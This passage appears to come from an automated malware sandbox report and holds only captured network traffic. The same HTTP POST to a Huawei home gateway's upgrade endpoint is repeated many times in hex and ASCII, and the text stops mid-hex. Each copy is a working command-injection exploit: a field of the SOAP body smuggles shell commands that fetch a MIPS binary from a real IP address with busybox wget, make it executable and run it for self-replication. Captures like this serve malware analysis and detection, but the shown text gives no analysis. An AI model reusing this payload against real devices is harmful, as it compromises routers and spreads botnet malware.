6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 